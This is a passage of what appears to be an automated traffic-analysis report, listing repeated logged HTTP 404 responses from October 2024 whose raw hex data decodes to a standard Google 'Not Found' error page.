31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:04 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:10:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 